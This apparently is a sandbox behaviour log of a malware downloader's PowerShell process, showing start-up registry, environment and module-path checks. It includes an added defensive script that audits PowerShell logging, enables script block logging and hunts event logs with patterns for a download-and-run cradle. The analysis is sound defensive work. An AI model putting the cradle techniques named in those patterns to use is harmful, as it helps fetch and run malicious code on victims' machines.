Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Environment Get Environment String name = USERPROFILE, result_out = C:\Users\FD1HVy True 1
Fn
File Get Info filename = C:\Users\FD1HVy, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Get Info filename = C:\, type = file_attributes True 2
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 162
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Thread 0x12a8
1 0
Category Operation Information Success Count Logfile
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0x1044
2 0
Category Operation Information Success Count Logfile
Environment Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_Disabled False 1
Fn
Environment Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_MinCount False 1
Fn
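The registry probes in this process are PowerShell's own start-up checks, and read together they describe the logging posture the downloader ran under. The lookups of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\<log>\PowerShell above locate the classic "PowerShell" event source, which exists only under the "Windows PowerShell" log (the one True result). In thread 0x1188 below, the opens of HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging and its HKEY_CURRENT_USER twin both return False, so script block logging was never enabled on this host, and the later read of __PSLockdownPolicy from Session Manager\Environment (False) together with the wldp.dll check means nothing forced the session out of FullLanguage mode. The following script is an added example, not part of the VMRay report and not code from the sample: it audits those same settings from the defender's side, creates the policy keys the sample found missing, and hunts both PowerShell event logs for the download cradle seen in process #2. The function names (Get-PSLoggingPosture, Enable-PSScriptBlockLogging, Find-PSDownloadCradle) and the default search patterns are this example's own; the registry paths, event IDs and environment value are the standard Windows ones that appear in the trace.

```powershell
# Added example for this report page, not code from VMRay or from the sample.
# Audits the PowerShell logging / lockdown settings that powershell.exe (#2) probed
# during start-up, enables the policy keys it found missing, and hunts both event
# logs for the download cradle. Run from an elevated Windows PowerShell 5.1 session.
# Function names and the default $Patterns are this example's own choices.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PSLoggingPosture {
    # The same things the trace shows the sample looking up, seen from the defender's side.
    $sbl = Get-ItemProperty -Path "$PolicyRoot\ScriptBlockLogging" -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    $ml  = Get-ItemProperty -Path "$PolicyRoot\ModuleLogging" -Name EnableModuleLogging -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ScriptBlockLogging = [bool]$sbl.EnableScriptBlockLogging   # policy key absent in the trace (False)
        ModuleLogging      = [bool]$ml.EnableModuleLogging
        # value the sample read from HKLM\System\CurrentControlSet\Control\Session Manager\Environment
        LockdownPolicy     = [Environment]::GetEnvironmentVariable('__PSLockdownPolicy', 'Machine')
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode   # FullLanguage unless WDAC/AppLocker applies
        ClassicLogSource   = [System.Diagnostics.EventLog]::SourceExists('PowerShell')  # the EventLog\...\PowerShell lookups
    }
}

function Enable-PSScriptBlockLogging {
    # Creates the exact policy key the sample opened and found absent, plus module logging
    # for the two modules whose cmdlets the one-liner uses (New-Object, Start-Process).
    $sbl = "$PolicyRoot\ScriptBlockLogging"
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

    $ml = "$PolicyRoot\ModuleLogging"
    New-Item -Path "$ml\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
    foreach ($m in 'Microsoft.PowerShell.Utility', 'Microsoft.PowerShell.Management') {
        Set-ItemProperty -Path "$ml\ModuleNames" -Name $m -Value $m
    }
}

function Find-PSDownloadCradle {
    # Events 400/403 in the classic "Windows PowerShell" log are written by default and their
    # HostApplication field carries the full command line, so the DownloadFile one-liner is
    # recoverable even on a host that never had script block logging. Event 4104 carries the
    # script block text and only exists after Enable-PSScriptBlockLogging has been applied.
    param([string[]]$Patterns = @('DownloadFile', 'WebClient', 'GetTempPath', 'Start-Process'))
    $regex = ($Patterns | ForEach-Object { [regex]::Escape($_) }) -join '|'

    $classic = Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400, 403 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $regex } |
        ForEach-Object {
            $hostLine = ($_.Message -split "`r?`n" | Where-Object { $_ -like '*HostApplication=*' }) -join ' '
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; Id = $_.Id; Source = 'Classic'; Text = $hostLine.Trim() }
        }

    $blocks = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $regex } |
        ForEach-Object {
            # Properties[2] is ScriptBlockText for event 4104.
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; Id = $_.Id; Source = 'ScriptBlock'; Text = $_.Properties[2].Value }
        }

    @($classic) + @($blocks) | Sort-Object TimeCreated
}

Get-PSLoggingPosture
Enable-PSScriptBlockLogging      # comment out to audit only
Find-PSDownloadCradle | Format-Table -AutoSize -Wrap
```

Event 400 is logged on every engine start by default, which is why the sample's own start-up has to find the "PowerShell" source under the "Windows PowerShell" log: that event records the -w 1 DownloadFile command line of process #2 whether or not script block logging is on, so a host that was hit by this document can still be triaged from the classic log alone. The 4104 events add the script block text, which matters once the cradle is obfuscated rather than passed in clear on the command line. __PSLockdownPolicy is a start-up diagnostic switch that PowerShell checks, not a supported security control; the supported way to force ConstrainedLanguage is a WDAC or AppLocker policy, which is what the wldp.dll lookup in this thread serves.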
Thread 0x1188
381 50
Category Operation Information Success Count Logfile
Environment Get Environment String name = PSModuleAutoLoadingPreference False 1
Fn
Environment Get Environment String name = MshEnableTrace False 3
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = PSModuleAutoLoadingPreference False 1
Fn
Environment Get Environment String name = PATH True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps;;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 2
Fn
File Get Info filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Get Info filename = C:\WINDOWS\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\System32\Wbem, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\Microsoft Office\root\Client, type = file_attributes True 1
Fn
Environment Get Environment String name = PSMODULEPATH, result_out = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Modules.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1, type = file_attributes True 2
Fn
Environment Get Environment String name = PSModuleAnalysisCachePath False 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, type = file_attributes True 1
Fn
File Create filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, type = file_type True 2
Fn
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 3, size_out = 3 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 9, size_out = 9 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 44, size_out = 44 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 12, size_out = 12 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4, size_out = 4 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 2
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 7, size_out = 7 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 22, size_out = 22 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 19, size_out = 19 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 2, size_out = 2 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 24, size_out = 24 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 11, size_out = 11 True 1
Fn
Data
File Read filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache, size = 4096, size_out = 3715 True 1
Fn
Data
Environment Get Environment String name = PSDisableModuleAnalysisCacheCleanup False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_attributes True 2
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.psm1, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.cdxml, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.xaml, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppLocker, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppvClient, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Appx, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BranchCache, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ConfigCI, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Defender, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Dism, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DnsClient, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\International, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\iSCSI, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ISE, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Kds, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MMAgent, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MsDtc, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MSMQ, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetAdapter, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetConnection, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetLbfo, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetNat, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetQos, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSecurity, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PKI, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PnpDevice, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PrintManagement, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Provisioning, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration, type = file_attributes True 1
Fn
